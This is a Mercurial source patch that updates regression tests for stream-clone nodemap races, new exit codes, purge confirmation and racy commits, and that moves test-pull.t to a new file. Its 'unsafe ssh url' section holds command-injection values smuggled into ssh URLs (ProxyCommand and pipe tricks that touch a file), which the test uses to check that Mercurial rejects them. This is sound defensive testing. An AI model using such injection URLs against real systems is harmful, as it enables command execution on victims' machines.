+ $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_1
+ $ hg -R test-repo/ commit -m foo
+ $ touch $HG_TEST_STREAM_WALKED_FILE_2
+ $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_3
+ $ cat clone-output
+ adding [s] 00manifest.n (70 bytes)
+ adding [s] 00manifest-*.nd (118 KB) (glob)
+ adding [s] 00changelog.n (70 bytes)
+ adding [s] 00changelog-*.nd (118 KB) (glob)
+ adding [s] 00manifest.d (452 KB) (no-zstd !)
+ adding [s] 00manifest.d (491 KB) (zstd !)
+ adding [s] 00changelog.d (360 KB) (no-zstd !)
+ adding [s] 00changelog.d (368 KB) (zstd !)
+ adding [s] 00manifest.i (313 KB)
+ adding [s] 00changelog.i (313 KB)
+
+Check the result state
+
+ $ f --size stream-clone-race-1/.hg/store/00changelog*
+ stream-clone-race-1/.hg/store/00changelog-*.nd: size=121088 (glob)
+ stream-clone-race-1/.hg/store/00changelog.d: size=368890 (no-zstd !)
+ stream-clone-race-1/.hg/store/00changelog.d: size=376891 (zstd !)
+ stream-clone-race-1/.hg/store/00changelog.i: size=320384
+ stream-clone-race-1/.hg/store/00changelog.n: size=70
+
+ $ hg -R stream-clone-race-1 debugnodemap --metadata | tee client-metadata.txt
+ uid: * (glob)
+ tip-rev: 5005
+ tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe
+ data-length: 121088
+ data-unused: 0
+ data-unused: 0.000%
+
+We get a usable nodemap, so no rewrite would be needed and the metadata should
+be identical (i.e. the following diff should be empty)
+
+This isn't the case for the `no-rust` `no-pure` implementation, as it uses a
+very minimal nodemap implementation that unconditionally rewrites the nodemap
+every time.
+
+#if no-rust no-pure
+ $ diff -u server-metadata.txt client-metadata.txt
+ --- server-metadata.txt * (glob)
+ +++ client-metadata.txt * (glob)
+ @@ -1,4 +1,4 @@
+ -uid: * (glob)
+ +uid: * (glob)
+ tip-rev: 5005
+ tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe
+ data-length: 121088
+ [1]
+#else
+ $ diff -u server-metadata.txt client-metadata.txt
+#endif
+
+
+Clean up after the test.
+
+ $ rm -f "$HG_TEST_STREAM_WALKED_FILE_1"
+ $ rm -f "$HG_TEST_STREAM_WALKED_FILE_2"
+ $ rm -f "$HG_TEST_STREAM_WALKED_FILE_3"
+
+full regeneration
+-----------------
+
+A full nodemap is generated
+
+(Ideally this test would append enough data to make sure the nodemap data file
+gets changed; however, to make things simpler we will force the regeneration
+for this test.)
+
+Check the initial state
+
+ $ f --size test-repo/.hg/store/00changelog*
+ test-repo/.hg/store/00changelog-*.nd: size=121344 (glob) (rust !)
+ test-repo/.hg/store/00changelog-*.nd: size=121344 (glob) (pure !)
+ test-repo/.hg/store/00changelog-*.nd: size=121152 (glob) (no-rust no-pure !)
+ test-repo/.hg/store/00changelog.d: size=376950 (zstd !)
+ test-repo/.hg/store/00changelog.d: size=368949 (no-zstd !)
+ test-repo/.hg/store/00changelog.i: size=320448
+ test-repo/.hg/store/00changelog.n: size=70
+ $ hg -R test-repo debugnodemap --metadata | tee server-metadata-2.txt
+ uid: * (glob)
+ tip-rev: 5006
+ tip-node: ed2ec1eef9aa2a0ec5057c51483bc148d03e810b
+ data-length: 121344 (rust !)
+ data-length: 121344 (pure !)
+ data-length: 121152 (no-rust no-pure !)
+ data-unused: 192 (rust !)
+ data-unused: 192 (pure !)
+ data-unused: 0 (no-rust no-pure !)
+ data-unused: 0.158% (rust !)
+ data-unused: 0.158% (pure !)
+ data-unused: 0.000% (no-rust no-pure !)
+
+Perform the mix of clone and full refresh of the nodemap, so that the files
+(and filenames) are different between listing time and actual transfer time.
+
+ $ (hg clone -U --stream --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/test-repo stream-clone-race-2 --debug 2>> clone-output-2 | egrep '00(changelog|manifest)' >> clone-output-2; touch $HG_TEST_STREAM_WALKED_FILE_3) &
+ $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_1
+ $ rm test-repo/.hg/store/00changelog.n
+ $ rm test-repo/.hg/store/00changelog-*.nd
+ $ hg -R test-repo/ debugupdatecache
+ $ touch $HG_TEST_STREAM_WALKED_FILE_2
+ $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_3
+ $ cat clone-output-2
+ adding [s] 00manifest.n (70 bytes)
+ adding [s] 00manifest-*.nd (118 KB) (glob)
+ adding [s] 00changelog.n (70 bytes)
+ adding [s] 00changelog-*.nd (118 KB) (glob)
+ adding [s] 00manifest.d (492 KB) (zstd !)
+ adding [s] 00manifest.d (452 KB) (no-zstd !)
+ adding [s] 00changelog.d (360 KB) (no-zstd !)
+ adding [s] 00changelog.d (368 KB) (zstd !)
+ adding [s] 00manifest.i (313 KB)
+ adding [s] 00changelog.i (313 KB)
+
+Check the result.
+
+ $ f --size stream-clone-race-2/.hg/store/00changelog*
+ stream-clone-race-2/.hg/store/00changelog-*.nd: size=121344 (glob) (rust !)
+ stream-clone-race-2/.hg/store/00changelog-*.nd: size=121344 (glob) (pure !)
+ stream-clone-race-2/.hg/store/00changelog-*.nd: size=121152 (glob) (no-rust no-pure !)
+ stream-clone-race-2/.hg/store/00changelog.d: size=376950 (zstd !)
+ stream-clone-race-2/.hg/store/00changelog.d: size=368949 (no-zstd !)
+ stream-clone-race-2/.hg/store/00changelog.i: size=320448
+ stream-clone-race-2/.hg/store/00changelog.n: size=70
+
+ $ hg -R stream-clone-race-2 debugnodemap --metadata | tee client-metadata-2.txt
+ uid: * (glob)
+ tip-rev: 5006
+ tip-node: ed2ec1eef9aa2a0ec5057c51483bc148d03e810b
+ data-length: 121344 (rust !)
+ data-unused: 192 (rust !)
+ data-unused: 0.158% (rust !)
+ data-length: 121152 (no-rust no-pure !)
+ data-unused: 0 (no-rust no-pure !)
+ data-unused: 0.000% (no-rust no-pure !)
+ data-length: 121344 (pure !)
+ data-unused: 192 (pure !)
+ data-unused: 0.158% (pure !)
+
+We get a usable nodemap, so no rewrite would be needed and the metadata should
+be identical (i.e. the following diff should be empty)
+
+This isn't the case for the `no-rust` `no-pure` implementation, as it uses a
+very minimal nodemap implementation that unconditionally rewrites the nodemap
+every time.
+
+#if no-rust no-pure
+ $ diff -u server-metadata-2.txt client-metadata-2.txt
+ --- server-metadata-2.txt * (glob)
+ +++ client-metadata-2.txt * (glob)
+ @@ -1,4 +1,4 @@
+ -uid: * (glob)
+ +uid: * (glob)
+ tip-rev: 5006
+ tip-node: ed2ec1eef9aa2a0ec5057c51483bc148d03e810b
+ data-length: 121152
+ [1]
+#else
+ $ diff -u server-metadata-2.txt client-metadata-2.txt
+#endif
+
+Clean up after the test
+
+ $ rm -f $HG_TEST_STREAM_WALKED_FILE_1
+ $ rm -f $HG_TEST_STREAM_WALKED_FILE_2
+ $ rm -f $HG_TEST_STREAM_WALKED_FILE_3
+
--- a/tests/test-phabricator.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-phabricator.t Tue Apr 20 11:01:06 2021 -0400
@@ -48,7 +48,7 @@
options:
(use 'hg debugcallconduit -h' to show more help)
- [255]
+ [10]
$ hg phabread
abort: empty DREVSPEC set
[255]
--- a/tests/test-phases.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-phases.t Tue Apr 20 11:01:06 2021 -0400
@@ -757,7 +757,7 @@
transaction abort!
rollback completed
abort: pretxnclose hook exited with status 1
- [255]
+ [40]
$ cp .hg/store/phaseroots.pending.saved .hg/store/phaseroots.pending
(check (in)visibility of phaseroot while transaction running in repo)
@@ -780,7 +780,7 @@
transaction abort!
rollback completed
abort: pretxnclose hook exited with status 1
- [255]
+ [40]
Check that pretxnclose-phase hook can control phase movement
@@ -854,12 +854,12 @@
transaction abort!
rollback completed
abort: pretxnclose-phase.nopublish_D hook exited with status 1
- [255]
+ [40]
$ hg phase --public a603bfb5a83e
transaction abort!
rollback completed
abort: pretxnclose-phase.nopublish_D hook exited with status 1
- [255]
+ [40]
$ hg phase --draft 17a481b3bccb
test-debug-phase: move rev 3: 2 -> 1
test-debug-phase: move rev 4: 2 -> 1
@@ -871,7 +871,7 @@
transaction abort!
rollback completed
abort: pretxnclose-phase.nopublish_D hook exited with status 1
- [255]
+ [40]
$ cd ..
@@ -886,6 +886,8 @@
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
@@ -913,6 +915,8 @@
fncache
generaldelta
internal-phase
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
--- a/tests/test-pull-bundle.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-pull-bundle.t Tue Apr 20 11:01:06 2021 -0400
@@ -185,7 +185,7 @@
adding changesets
adding manifests
adding file changes
- abort: 00changelog.i@66f7d451a68b: no node
+ abort: 00changelog.i@66f7d451a68b85ed82ff5fcc254daf50c74144bd: no node
[50]
$ cd ..
$ killdaemons.py
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/tests/test-pull-network.t Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,137 @@
+#require serve
+
+#testcases sshv1 sshv2
+
+#if sshv2
+ $ cat >> $HGRCPATH << EOF
+ > [experimental]
+ > sshpeer.advertise-v2 = true
+ > sshserver.support-v2 = true
+ > EOF
+#endif
+
+ $ hg init test
+ $ cd test
+
+ $ echo foo>foo
+ $ hg addremove
+ adding foo
+ $ hg commit -m 1
+
+ $ hg verify
+ checking changesets
+ checking manifests
+ crosschecking files in changesets and manifests
+ checking files
+ checked 1 changesets with 1 changes to 1 files
+
+ $ hg serve -p $HGPORT -d --pid-file=hg.pid
+ $ cat hg.pid >> $DAEMON_PIDS
+ $ cd ..
+
+ $ hg clone --pull http://foo:bar@localhost:$HGPORT/ copy
+ requesting all changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 1 changesets with 1 changes to 1 files
+ new changesets 340e38bdcde4
+ updating to branch default
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+
+ $ cd copy
+ $ hg verify
+ checking changesets
+ checking manifests
+ crosschecking files in changesets and manifests
+ checking files
+ checked 1 changesets with 1 changes to 1 files
+
+ $ hg co
+ 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ $ cat foo
+ foo
+
+ $ hg manifest --debug
+ 2ed2a3912a0b24502043eae84ee4b279c18b90dd 644 foo
+
+ $ hg pull
+ pulling from http://foo@localhost:$HGPORT/
+ searching for changes
+ no changes found
+
+ $ hg rollback --dry-run --verbose
+ repository tip rolled back to revision -1 (undo pull: http://foo:***@localhost:$HGPORT/)
+
+Test pull of a non-existing 20-character revision specification, making sure plain ASCII
+identifiers are not encoded like a node:
+
+ $ hg pull -r 'xxxxxxxxxxxxxxxxxxxy'
+ pulling from http://foo@localhost:$HGPORT/
+ abort: unknown revision 'xxxxxxxxxxxxxxxxxxxy'
+ [255]
+ $ hg pull -r 'xxxxxxxxxxxxxxxxxx y'
+ pulling from http://foo@localhost:$HGPORT/
+ abort: unknown revision 'xxxxxxxxxxxxxxxxxx y'
+ [255]
+
+Test pull of working copy revision
+ $ hg pull -r 'ffffffffffff'
+ pulling from http://foo@localhost:$HGPORT/
+ abort: unknown revision 'ffffffffffff'
+ [255]
+
+Test 'file:' uri handling:
+
+ $ hg pull -q file://../test-does-not-exist
+ abort: file:// URLs can only refer to localhost
+ [255]
+
+ $ hg pull -q file://../test
+ abort: file:// URLs can only refer to localhost
+ [255]
+
+MSYS changes 'file:' into 'file;'
+
+#if no-msys
+ $ hg pull -q file:../test # no-msys
+#endif
+
+It's tricky to make file:// URLs work on every platform with
+regular shell commands.
+
+ $ URL=`"$PYTHON" -c "from __future__ import print_function; import os; print('file://foobar' + ('/' + os.getcwd().replace(os.sep, '/')).replace('//', '/') + '/../test')"`
+ $ hg pull -q "$URL"
+ abort: file:// URLs can only refer to localhost
+ [255]
+
+ $ URL=`"$PYTHON" -c "from __future__ import print_function; import os; print('file://localhost' + ('/' + os.getcwd().replace(os.sep, '/')).replace('//', '/') + '/../test')"`
+ $ hg pull -q "$URL"
+
+SEC: check for unsafe ssh url
+
+ $ cat >> $HGRCPATH << EOF
+ > [ui]
+ > ssh = sh -c "read l; read l; read l"
+ > EOF
+
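+(The `ssh` stub above never runs a real ssh: `sh -c "read l; read l; read l"`
+just consumes a few lines of input and exits. The `potentially unsafe url`
+aborts below come from Mercurial's own URL vetting, before any command is
+spawned; the `fakehost` cases instead fail the handshake against the silent
+stub.)
+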
+ $ hg pull 'ssh://-oProxyCommand=touch${IFS}owned/path'
+ pulling from ssh://-oProxyCommand%3Dtouch%24%7BIFS%7Downed/path
+ abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path'
+ [255]
+ $ hg pull 'ssh://%2DoProxyCommand=touch${IFS}owned/path'
+ pulling from ssh://-oProxyCommand%3Dtouch%24%7BIFS%7Downed/path
+ abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path'
+ [255]
+ $ hg pull 'ssh://fakehost|touch${IFS}owned/path'
+ pulling from ssh://fakehost%7Ctouch%24%7BIFS%7Downed/path
+ abort: no suitable response from remote hg
+ [255]
+ $ hg --config ui.timestamp-output=true pull 'ssh://fakehost%7Ctouch%20owned/path'
+ \[20[2-9][0-9]-[01][0-9]-[0-3][0-9]T[0-5][0-9]:[0-5][0-9]:[0-5][0-9]\.[0-9][0-9][0-9][0-9][0-9][0-9]\] pulling from ssh://fakehost%7Ctouch%20owned/path (re)
+ \[20[2-9][0-9]-[01][0-9]-[0-3][0-9]T[0-5][0-9]:[0-5][0-9]:[0-5][0-9]\.[0-9][0-9][0-9][0-9][0-9][0-9]\] abort: no suitable response from remote hg (re)
+ [255]
+
+ $ [ ! -f owned ] || echo 'you got owned'
+
+ $ cd ..
--- a/tests/test-pull-update.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-pull-update.t Tue Apr 20 11:01:06 2021 -0400
@@ -246,3 +246,25 @@
active-before-pull 3:483b76ad4309
$ cd ..
+
+Issue622: hg init && hg pull -u URL doesn't checkout default branch
+
+ $ hg init test
+ $ cd test
+ $ echo foo>foo
+ $ hg addremove
+ adding foo
+ $ hg commit -m 1
+ $ cd ..
+
+ $ hg init empty
+ $ cd empty
+ $ hg pull -u ../test
+ pulling from ../test
+ requesting all changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 1 changesets with 1 changes to 1 files
+ new changesets 340e38bdcde4
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
--- a/tests/test-pull.t Thu Mar 25 19:06:28 2021 -0400
+++ /dev/null Thu Jan 01 00:00:00 1970 +0000
@@ -1,152 +0,0 @@
-#require serve
-
-#testcases sshv1 sshv2
-
-#if sshv2
- $ cat >> $HGRCPATH << EOF
- > [experimental]
- > sshpeer.advertise-v2 = true
- > sshserver.support-v2 = true
- > EOF
-#endif
-
- $ hg init test
- $ cd test
-
- $ echo foo>foo
- $ hg addremove
- adding foo
- $ hg commit -m 1
-
- $ hg verify
- checking changesets
- checking manifests
- crosschecking files in changesets and manifests
- checking files
- checked 1 changesets with 1 changes to 1 files
-
- $ hg serve -p $HGPORT -d --pid-file=hg.pid
- $ cat hg.pid >> $DAEMON_PIDS
- $ cd ..
-
- $ hg clone --pull http://foo:bar@localhost:$HGPORT/ copy
- requesting all changes
- adding changesets
- adding manifests
- adding file changes
- added 1 changesets with 1 changes to 1 files
- new changesets 340e38bdcde4
- updating to branch default
- 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
-
- $ cd copy
- $ hg verify
- checking changesets
- checking manifests
- crosschecking files in changesets and manifests
- checking files
- checked 1 changesets with 1 changes to 1 files
-
- $ hg co
- 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
- $ cat foo
- foo
-
- $ hg manifest --debug
- 2ed2a3912a0b24502043eae84ee4b279c18b90dd 644 foo
-
- $ hg pull
- pulling from http://foo@localhost:$HGPORT/
- searching for changes
- no changes found
-
- $ hg rollback --dry-run --verbose
- repository tip rolled back to revision -1 (undo pull: http://foo:***@localhost:$HGPORT/)
-
-Test pull of non-existing 20 character revision specification, making sure plain ascii identifiers
-not are encoded like a node:
-
- $ hg pull -r 'xxxxxxxxxxxxxxxxxxxy'
- pulling from http://foo@localhost:$HGPORT/
- abort: unknown revision 'xxxxxxxxxxxxxxxxxxxy'
- [255]
- $ hg pull -r 'xxxxxxxxxxxxxxxxxx y'
- pulling from http://foo@localhost:$HGPORT/
- abort: unknown revision 'xxxxxxxxxxxxxxxxxx y'
- [255]
-
-Test pull of working copy revision
- $ hg pull -r 'ffffffffffff'
- pulling from http://foo@localhost:$HGPORT/
- abort: unknown revision 'ffffffffffff'
- [255]
-
-Issue622: hg init && hg pull -u URL doesn't checkout default branch
-
- $ cd ..
- $ hg init empty
- $ cd empty
- $ hg pull -u ../test
- pulling from ../test
- requesting all changes
- adding changesets
- adding manifests
- adding file changes
- added 1 changesets with 1 changes to 1 files
- new changesets 340e38bdcde4
- 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
-
-Test 'file:' uri handling:
-
- $ hg pull -q file://../test-does-not-exist
- abort: file:// URLs can only refer to localhost
- [255]
-
- $ hg pull -q file://../test
- abort: file:// URLs can only refer to localhost
- [255]
-
-MSYS changes 'file:' into 'file;'
-
-#if no-msys
- $ hg pull -q file:../test # no-msys
-#endif
-
-It's tricky to make file:// URLs working on every platform with
-regular shell commands.
-
- $ URL=`"$PYTHON" -c "from __future__ import print_function; import os; print('file://foobar' + ('/' + os.getcwd().replace(os.sep, '/')).replace('//', '/') + '/../test')"`
- $ hg pull -q "$URL"
- abort: file:// URLs can only refer to localhost
- [255]
-
- $ URL=`"$PYTHON" -c "from __future__ import print_function; import os; print('file://localhost' + ('/' + os.getcwd().replace(os.sep, '/')).replace('//', '/') + '/../test')"`
- $ hg pull -q "$URL"
-
-SEC: check for unsafe ssh url
-
- $ cat >> $HGRCPATH << EOF
- > [ui]
- > ssh = sh -c "read l; read l; read l"
- > EOF
-
- $ hg pull 'ssh://-oProxyCommand=touch${IFS}owned/path'
- pulling from ssh://-oProxyCommand%3Dtouch%24%7BIFS%7Downed/path
- abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path'
- [255]
- $ hg pull 'ssh://%2DoProxyCommand=touch${IFS}owned/path'
- pulling from ssh://-oProxyCommand%3Dtouch%24%7BIFS%7Downed/path
- abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path'
- [255]
- $ hg pull 'ssh://fakehost|touch${IFS}owned/path'
- pulling from ssh://fakehost%7Ctouch%24%7BIFS%7Downed/path
- abort: no suitable response from remote hg
- [255]
- $ hg --config ui.timestamp-output=true pull 'ssh://fakehost%7Ctouch%20owned/path'
- \[20[2-9][0-9]-[01][0-9]-[0-3][0-9]T[0-5][0-9]:[0-5][0-9]:[0-5][0-9]\.[0-9][0-9][0-9][0-9][0-9][0-9]\] pulling from ssh://fakehost%7Ctouch%20owned/path (re)
- \[20[2-9][0-9]-[01][0-9]-[0-3][0-9]T[0-5][0-9]:[0-5][0-9]:[0-5][0-9]\.[0-9][0-9][0-9][0-9][0-9][0-9]\] abort: no suitable response from remote hg (re)
- [255]
-
- $ [ ! -f owned ] || echo 'you got owned'
-
- $ cd ..
--- a/tests/test-purge.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-purge.t Tue Apr 20 11:01:06 2021 -0400
@@ -1,8 +1,3 @@
- $ cat <<EOF >> $HGRCPATH
- > [extensions]
- > purge =
- > EOF
-
init
$ hg init t
@@ -18,11 +13,35 @@
$ echo 'ignored' > .hgignore
$ hg ci -qAmr3 -d'2 0'
+purge without the extension
+
+ $ hg st
+ $ touch foo
+ $ hg purge
+ permanently delete 1 unkown files? (yN) n
+ abort: removal cancelled
+ [250]
+ $ hg st
+ ? foo
+ $ hg purge --no-confirm
+ $ hg st
+
+now enabling the extension
+
+ $ cat <<EOF >> $HGRCPATH
+ > [extensions]
+ > purge =
+ > EOF
+
delete an empty directory
$ mkdir empty_dir
$ hg purge -p -v
empty_dir
+ $ hg purge --confirm
+ permanently delete at least 1 empty directories? (yN) n
+ abort: removal cancelled
+ [250]
$ hg purge -v
removing directory empty_dir
$ ls -A
@@ -62,6 +81,10 @@
$ hg purge -p
untracked_file
untracked_file_readonly
+ $ hg purge --confirm
+ permanently delete 2 unkown files? (yN) n
+ abort: removal cancelled
+ [250]
$ hg purge -v
removing file untracked_file
removing file untracked_file_readonly
@@ -121,6 +144,10 @@
$ cd directory
$ hg purge -p ../untracked_directory
untracked_directory/nested_directory
+ $ hg purge --confirm
+ permanently delete 1 unkown files? (yN) n
+ abort: removal cancelled
+ [250]
$ hg purge -v ../untracked_directory
removing directory untracked_directory/nested_directory
removing directory untracked_directory
@@ -138,6 +165,7 @@
$ touch ignored
$ hg purge -p
+ $ hg purge --confirm
$ hg purge -v
$ touch untracked_file
$ ls
@@ -147,6 +175,10 @@
untracked_file
$ hg purge -p -i
ignored
+ $ hg purge --confirm -i
+ permanently delete 1 ignored files? (yN) n
+ abort: removal cancelled
+ [250]
$ hg purge -v -i
removing file ignored
$ ls -A
@@ -159,6 +191,10 @@
$ hg purge -p --all
ignored
untracked_file
+ $ hg purge --confirm --all
+ permanently delete 1 unkown and 1 ignored files? (yN) n
+ abort: removal cancelled
+ [250]
$ hg purge -v --all
removing file ignored
removing file untracked_file
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/tests/test-racy-mutations.t Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,102 @@
+#testcases skip-detection fail-if-detected
+
+Test situations that "should" only be reproducible:
+- on networked filesystems, or
+- a user using `hg debuglocks` to eliminate the lock file, or
+- something (that doesn't respect the lock file) writing to the .hg directory
+while we're running
+
+ $ hg init a
+ $ cd a
+
+ $ cat > "$TESTTMP/waitlock_editor.sh" <<EOF
+ > [ -n "\${WAITLOCK_ANNOUNCE:-}" ] && touch "\${WAITLOCK_ANNOUNCE}"
+ > f="\${WAITLOCK_FILE}"
+ > start=\`date +%s\`
+ > timeout=5
+ > while [ \\( ! -f \$f \\) -a \\( ! -L \$f \\) ]; do
+ > now=\`date +%s\`
+ > if [ "\`expr \$now - \$start\`" -gt \$timeout ]; then
+ > echo "timeout: \$f was not created in \$timeout seconds (it is now \$(date +%s))"
+ > exit 1
+ > fi
+ > sleep 0.1
+ > done
+ > if [ \$# -gt 1 ]; then
+ > cat "\$@"
+ > fi
+ > EOF
+ $ chmod +x "$TESTTMP/waitlock_editor.sh"
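+
+(The script doubles as a plain wait helper below: invoked without file
+arguments it only blocks until WAITLOCK_FILE exists, while as HGEDITOR it
+also prints the commit message file once unblocked.)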
+
+Things behave differently if we don't already have a 00changelog.i file when
+this all starts, so let's make one.
+
+ $ echo r0 > r0
+ $ hg commit -qAm 'r0'
+
+Start an hg commit that will take a while
+ $ EDITOR_STARTED="$(pwd)/.editor_started"
+ $ MISCHIEF_MANAGED="$(pwd)/.mischief_managed"
+ $ JOBS_FINISHED="$(pwd)/.jobs_finished"
+
+#if fail-if-detected
+ $ cat >> .hg/hgrc << EOF
+ > [debug]
+ > revlog.verifyposition.changelog = fail
+ > EOF
+#endif
+
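+(`debug.revlog.verifyposition.changelog` is a debug knob; presumably it makes
+the changelog check that the file cursor is at the expected position before
+appending, and `fail` turns a mismatch into a transaction abort, which is
+what this testcase exercises.)
+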
+ $ echo foo > foo
+ $ (WAITLOCK_ANNOUNCE="${EDITOR_STARTED}" \
+ > WAITLOCK_FILE="${MISCHIEF_MANAGED}" \
+ > HGEDITOR="$TESTTMP/waitlock_editor.sh" \
+ > hg commit -qAm 'r1 (foo)' --edit foo > .foo_commit_out 2>&1 ; touch "${JOBS_FINISHED}") &
+
+Wait for the "editor" to actually start
+ $ WAITLOCK_FILE="${EDITOR_STARTED}" "$TESTTMP/waitlock_editor.sh"
+
+Break the locks, and make another commit.
+ $ hg debuglocks -LW
+ $ echo bar > bar
+ $ hg commit -qAm 'r2 (bar)' bar
+ $ hg debugrevlogindex -c
+ rev linkrev nodeid p1 p2
+ 0 0 222799e2f90b 000000000000 000000000000
+ 1 1 6f124f6007a0 222799e2f90b 000000000000
+
+Awaken the editor from that first commit
+ $ touch "${MISCHIEF_MANAGED}"
+And wait for it to finish
+ $ WAITLOCK_FILE="${JOBS_FINISHED}" "$TESTTMP/waitlock_editor.sh"
+
+#if skip-detection
+(Ensure there was no output)
+ $ cat .foo_commit_out
+And observe a corrupted repository -- rev 2's linkrev is 1, which should never
+happen for the changelog (the linkrev should always refer to itself).
+ $ hg debugrevlogindex -c
+ rev linkrev nodeid p1 p2
+ 0 0 222799e2f90b 000000000000 000000000000
+ 1 1 6f124f6007a0 222799e2f90b 000000000000
+ 2 1 ac80e6205bb2 222799e2f90b 000000000000
+#endif
+
+#if fail-if-detected
+ $ cat .foo_commit_out
+ transaction abort!
+ rollback completed
+ note: commit message saved in .hg/last-message.txt
+ note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it
+ abort: 00changelog.i: file cursor at position 249, expected 121
+And no corruption in the changelog.
+ $ hg debugrevlogindex -c
+ rev linkrev nodeid p1 p2
+ 0 0 222799e2f90b 000000000000 000000000000
+ 1 1 6f124f6007a0 222799e2f90b 000000000000
+And, because of transactions, there's none in the manifestlog either.
+ $ hg debugrevlogindex -m
+ rev linkrev nodeid p1 p2
+ 0 0 7b7020262a56 000000000000 000000000000
+ 1 1 ad3fe36d86d9 7b7020262a56 000000000000
+#endif
+
--- a/tests/test-rebase-abort.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-rebase-abort.t Tue Apr 20 11:01:06 2021 -0400
@@ -95,6 +95,7 @@
ancestor path: common (node de0a666fdd9c1a0b0698b90d85064d8bd34f74b6)
other path: common (node 2f6411de53677f6f1048fef5bf888d67a342e0a5)
extra: ancestorlinknode = 3163e20567cc93074fbb7a53c8b93312e59dbf2c
+ extra: merged = yes
$ hg resolve -l
U common
--- a/tests/test-rebase-collapse.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-rebase-collapse.t Tue Apr 20 11:01:06 2021 -0400
@@ -134,7 +134,7 @@
$ hg rebase --base B -m 'custom message'
abort: message can only be specified with collapse
- [255]
+ [10]
$ cat > $TESTTMP/checkeditform.sh <<EOF
> env | grep HGEDITFORM
@@ -180,7 +180,7 @@
$ hg rebase -s C --dest H --collapse
abort: unable to collapse on top of 3, there is more than one external parent: 1, 6
- [255]
+ [20]
Rebase and collapse - E onto H:
@@ -386,7 +386,7 @@
BROKEN: should be allowed
$ hg rebase --collapse -r 'B+D+F' -d G
abort: unable to collapse on top of 2, there is more than one external parent: 3, 5
- [255]
+ [20]
$ cd ..
@@ -404,7 +404,7 @@
$ hg rebase --collapse -d H -s 'B+F'
abort: unable to collapse on top of 5, there is more than one external parent: 1, 3
- [255]
+ [20]
$ cd ..
With internal merge:
@@ -484,7 +484,7 @@
$ hg rebase --keepbranches --collapse -s 1 -d 3
abort: cannot collapse multiple named branches
- [255]
+ [10]
$ cd ..
--- a/tests/test-rebase-conflicts.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-rebase-conflicts.t Tue Apr 20 11:01:06 2021 -0400
@@ -318,10 +318,10 @@
bundle2-input-part: total payload size 1686
bundle2-input-part: "cache:rev-branch-cache" (advisory) supported
bundle2-input-part: total payload size 74
- truncating cache/rbc-revs-v1 to 56
bundle2-input-part: "phase-heads" supported
bundle2-input-part: total payload size 24
bundle2-input-bundle: 3 parts total
+ truncating cache/rbc-revs-v1 to 72
added 2 changesets with 2 changes to 1 files
updating the branch cache
invalid branch cache (served): tip differs
--- a/tests/test-rebase-dest.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-rebase-dest.t Tue Apr 20 11:01:06 2021 -0400
@@ -18,7 +18,7 @@
$ hg rebase
abort: you must specify a destination
(use: hg rebase -d REV)
- [255]
+ [10]
$ hg rebase -d 1
rebasing 2:5db65b93a12b tip "cc"
saved backup bundle to $TESTTMP/repo/.hg/strip-backup/5db65b93a12b-4fb789ec-rebase.hg
@@ -74,7 +74,7 @@
$ hg pull --rebase
abort: rebase destination required by configuration
(use hg pull followed by hg rebase -d DEST)
- [255]
+ [10]
Setup rebase with multiple destinations
@@ -152,7 +152,7 @@
> A D
> EOS
abort: --collapse does not work with multiple destinations
- [255]
+ [10]
Multiple destinations cannot be used with --base:
@@ -192,7 +192,7 @@
> Z
> EOS
abort: rebase destination for f0a671a46792 is not unique
- [255]
+ [10]
Destination is an ancestor of source:
@@ -204,7 +204,7 @@
> Z
> EOS
abort: source and destination form a cycle
- [255]
+ [10]
BUG: cycles aren't flagged correctly when --dry-run is set:
$ rebasewithdag -s B -d 'SRC' --dry-run <<'EOS'
@@ -216,7 +216,7 @@
> EOS
abort: source and destination form a cycle
starting dry-run rebase; repository will not be changed
- [255]
+ [10]
Switch roots:
@@ -329,7 +329,7 @@
> Z
> EOS
abort: source and destination form a cycle
- [255]
+ [10]
Detect source is ancestor of dest in runtime:
@@ -341,7 +341,7 @@
> A
> EOS
abort: source is ancestor of destination
- [255]
+ [10]
"Already rebased" fast path still works:
--- a/tests/test-rebase-interruptions.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-rebase-interruptions.t Tue Apr 20 11:01:06 2021 -0400
@@ -350,7 +350,7 @@
M A
rebasing 6:a0b2430ebfb8 tip "F"
abort: precommit hook exited with status 1
- [255]
+ [40]
$ hg tglogp
@ 7: 401ccec5e39f secret 'C'
|
